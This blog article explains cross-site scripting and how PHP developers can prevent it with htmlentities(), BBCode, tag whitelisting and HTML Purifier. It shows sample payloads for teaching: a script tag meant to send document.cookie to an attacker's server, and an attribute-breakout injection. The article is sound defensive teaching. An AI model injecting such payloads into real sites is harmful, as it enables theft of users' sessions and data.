Security Mecca

What are cross site scripting attacks and how can I prevent them?

Posted in Articles, Coders, PHP on


Allowing users to interact with your website through forms is a great way to set your site apart from others. However, it is also a great way to get attacked if you, as the developer, are not very cautious with the data users enter. Although it is probably getting tiresome to hear, security really must begin by assuming that all data you did not set yourself could be tainted. That data could come directly from users (form submissions, for example) or from external feeds and other outside sources. No outside data can be trusted. If it is trusted and sent straight back to users without being escaped, serious security holes open up.

What exactly is Cross Site Scripting, or XSS as it is better known? An XSS attack happens when a web page displays HTML or JavaScript that an attacker provided. While it is often useful to show exactly what the user entered (HTML markup and all), such as in a blog or CMS, it is inherently dangerous: a few too many strong or em tags will not hurt anyone, but injected JavaScript that steals data or delivers malware certainly will. For example, a normal user might enter

<strong>Thanks</strong> for this great blog!

for their comment, but there is nothing stopping an attacker from entering something like


<script>window.location = "" + document.cookie;</script>


which will grab the current user’s cookie (which could contain authentication information if the user is logged in) and automatically send it to the attacker’s server.

The best way to prevent XSS attacks is to disallow HTML completely. This is the safest choice because there is no possibility of forgetting a tag or missing an attribute and letting an XSS attack through. If the developer is using PHP, this is easily done with the htmlentities() function, which converts the special characters in a text string into their safe HTML entity equivalents. (Pass the ENT_QUOTES flag so that single quotes are converted as well; before PHP 8.1 the default flags leave them alone.) The two most dangerous groups of special characters are the less than and greater than signs and the quote marks. Since these characters open and close HTML tags and attribute values, an attacker who can inject them can insert any desired HTML into the page, even where it would not “logically” fit within the surrounding HTML. For example, if we have a form which asks the user for a color name and we then use that color as the background color of a div element without escaping it, we open our site up to an XSS attack. Let us look at the code, which will hopefully make this clearer. We have some sample HTML like this to show a background color entered by the user:

<div style="background-color: {$color}">a div here with some text</div>

While that does not look dangerous, it is if the attacker uses a carefully crafted “color” like

red"><script>alert('XSS');</script><br class="

Overall, the browser would see the whole line as this:

<div style="background-color: red"><script>alert('XSS');</script><br class="">a div here with some text</div>

Notice how the attacker closed the style attribute with the extra quote mark and inserted some JavaScript to prove the attack? An XSS attack is similar in nature to a SQL injection attack, and the same basic principle used to stop SQL injection applies here as well: any data that gets sent to an outside destination should be escaped for that destination. In other words, special characters like the less than and greater than signs and quote marks should be turned into harmless equivalent HTML entities. Appropriately enough, the htmlentities() function is well suited to this purpose when the data is placed in HTML text or in a quoted attribute value, as in the example above.
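To make the fix concrete, here is a minimal sketch that runs the crafted color value shown above through htmlentities() before placing it in the div. The helper name escape_html() and the variable names are illustrative assumptions, not part of the original example.

```php
<?php
// Hypothetical helper (name chosen for illustration): escape a value for
// use in HTML text or inside a quoted attribute value.
function escape_html(string $value): string
{
    // ENT_QUOTES converts both double and single quotes; the charset is explicit.
    return htmlentities($value, ENT_QUOTES, 'UTF-8');
}

// The carefully crafted "color" from the attack described above.
$color = 'red"><script>alert(\'XSS\');</script><br class="';

// Without escaping, the attacker's markup becomes part of the page.
$unsafe = '<div style="background-color: ' . $color . '">a div here with some text</div>';

// With escaping, the whole value stays inside the style attribute.
$escaped = escape_html($color);
$safe = '<div style="background-color: ' . $escaped . '">a div here with some text</div>';

echo $safe, PHP_EOL;
```

In the escaped version the quote marks and angle brackets arrive as entities such as &quot; and &lt;, so the browser never sees a closing quote or a script tag. Escaping only keeps the value inside the attribute; it does not check that the value is a sensible color.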

Escaping all output is the preferred way to prevent XSS since there is no possibility of the developer forgetting a tag, or of a new HTML tag being introduced that the validator does not know about. If HTML must be allowed, there are a few ways to do it relatively safely. In order from the safest to the most problematic, they are BBCode, whitelisted HTML, and HTML validators.

The first option is to use a pseudo markup language like BBCode for entering posts. This is an excellent solution since it is a form of the whitelist approach: all entered content is escaped by default, then a small set of safe pseudo tags is transformed into HTML. It is safer than whitelisting real HTML tags because it is a stricter whitelist: BBCode usually does not accept arbitrary HTML attributes (style, title, etc.) and has a much more rigid syntax than HTML.
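The escape-first, transform-second order described above can be sketched as follows. This is a deliberately tiny illustration, assuming only two attribute-free tags ([b] and [i]); the function name render_bbcode() is hypothetical and this is not a full BBCode parser.

```php
<?php
// Hypothetical minimal BBCode renderer: supports only [b] and [i].
function render_bbcode(string $input): string
{
    // Step 1: escape everything, so no user-supplied HTML survives.
    $escaped = htmlentities($input, ENT_QUOTES, 'UTF-8');

    // Step 2: turn a fixed set of paired pseudo tags into HTML.
    // The square brackets are untouched by htmlentities(), so they still match.
    $patterns = [
        '#\[b\](.*?)\[/b\]#s',
        '#\[i\](.*?)\[/i\]#s',
    ];
    $replacements = [
        '<strong>$1</strong>',
        '<em>$1</em>',
    ];

    // preg_replace() returns null on a regex error; fall back to the escaped text.
    return preg_replace($patterns, $replacements, $escaped) ?? $escaped;
}

echo render_bbcode('[b]Thanks[/b] for this <script>alert(1)</script> blog!'), PHP_EOL;
```

Because the only HTML in the output is what the function itself writes, an unpaired or mis-nested pseudo tag can at worst produce untidy markup, not script injection.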

The second approach is to escape all output, then turn a few allowed tags in the escaped output back into HTML (a whitelist approach). Its safety depends on the routine that restores the tags being strict and comprehensive, but it is on the right track since everything is escaped by default.
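A rough sketch of this second approach, assuming a whitelist of just strong and em with no attributes allowed. The function name allow_basic_tags() and the default tag list are illustrative assumptions.

```php
<?php
// Hypothetical helper: escape everything, then restore only exact,
// attribute-free tags from a short whitelist.
function allow_basic_tags(string $input, array $allowed = ['strong', 'em']): string
{
    // Everything is escaped by default.
    $result = htmlentities($input, ENT_QUOTES, 'UTF-8');

    foreach ($allowed as $tag) {
        $quoted = preg_quote($tag, '#');
        // Match the escaped forms &lt;tag&gt; and &lt;/tag&gt; only.
        // A tag carrying any attribute does not match and stays escaped.
        $pattern = '#&lt;(/?)' . $quoted . '&gt;#i';
        $result = preg_replace($pattern, '<${1}' . $tag . '>', $result) ?? $result;
    }

    return $result;
}

echo allow_basic_tags('<strong>Thanks</strong> for this <em onclick="x()">great</em> blog!'), PHP_EOL;
```

The strictness lives in the pattern: because it matches only the bare tag name between the escaped angle brackets, an attribute such as onclick keeps the whole tag escaped instead of being restored.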

Finally, the most liberal approach (and therefore the one most likely to cause problems) is to parse the entered HTML, clean it up, and remove any JavaScript. The open source PHP library HTML Purifier is probably the best choice for this task since it is mature and widely reviewed. A developer should still be wary of this approach, though. From a security principle standpoint, any cleaner that works by blacklisting malicious HTML or JavaScript is problematic, and as we know by now, blacklists are more error prone than whitelists. HTML Purifier itself works from a whitelist of permitted elements and attributes, but it still has to parse and accept real HTML from the user, so the result is only as safe as the parser and its configuration.

All of the above proposed solutions are server side. While these are the safest, since users cannot modify server side checks or routines, they do not help if a developer needs to print out user supplied text immediately, such as in an advanced JavaScript application. One WebGoat tutorial had a brilliantly simple solution. It takes the user’s input, creates a div element in memory, assigns the input as the div’s text content, then reads the div’s HTML back out. This works because the browser stores text content as plain text, so any markup in the input comes back with its special characters already escaped.

XSS attacks are among the most common and most dangerous attacks facing web applications today. They are incredibly easy to pull off since the tools (input fields) are already provided and the attack can be done quickly and effectively. Thankfully, XSS attacks are easy to prevent by using htmlentities() (or one of the other solutions we discussed) on any outside data before sending it to the browser.


about the author

More about Jeremy Conley:
Jeremy is a student at Western Michigan University, where he is dual majoring in Electronic Business Design and Film & Video Studies. When not programming or researching design and security topics, Jeremy enjoys movies, photography, and drinking coffee in all the amazing local Kalamazoo coffee shops.
